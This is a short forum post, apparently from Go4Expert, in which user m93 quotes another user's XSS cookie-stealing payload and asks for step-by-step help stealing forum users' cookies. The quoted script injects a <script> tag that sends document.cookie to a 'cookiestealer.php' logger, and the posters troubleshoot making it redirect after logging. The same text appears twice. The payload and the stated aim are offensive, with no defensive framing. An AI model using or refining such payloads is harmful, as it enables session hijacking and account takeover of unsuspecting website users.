Go4Expert - View Single Post

m93

Quote:

Originally Posted by Toddie
I am testing a xss vulnerability but your script does not work.
your script redirects but does not log cookies.

I am using this script right now and it works fine.

xss injection<script>document.location='url/cookiestealer.php?cookie='+escape(document.cookie) </script>

when i use this injection code cookies are logged into cookies.txt via this script

cookiestealer.php

This works fine but it does not redirect to a new page. I tried adding redirect code to the injected code and also to the .php file itself and there has been no success. Tampering with the code tends to redirect the page before the logging function executes, or does not redirect the page at all, or both.

I tried your script and it does not work.
why does your script not log cookies? where is the error? If you can't answer that question then here is another question.

what do I need to do to get my script able to redirect to another page after it executes?

i downloaded the scriptsthis topic. script doesnt have problem? plz explain if i want steal users cookie (in forums) what should i do? (step by step) tnx a lot

m93 Go4Expert Member
11Jan2010,14:13
	Quote: Originally Posted by Toddie I am testing a xss vulnerability but your script does not work. your script redirects but does not log cookies. I am using this script right now and it works fine. xss injection<script>document.location='url/cookiestealer.php?cookie='+escape(document.cookie) </script> when i use this injection code cookies are logged into cookies.txt via this script cookiestealer.php This works fine but it does not redirect to a new page. I tried adding redirect code to the injected code and also to the .php file itself and there has been no success. Tampering with the code tends to redirect the page before the logging function executes, or does not redirect the page at all, or both. I tried your script and it does not work. why does your script not log cookies? where is the error? If you can't answer that question then here is another question. what do I need to do to get my script able to redirect to another page after it executes? i downloaded the scriptsthis topic. script doesnt have problem? plz explain if i want steal users cookie (in forums) what should i do? (step by step) tnx a lot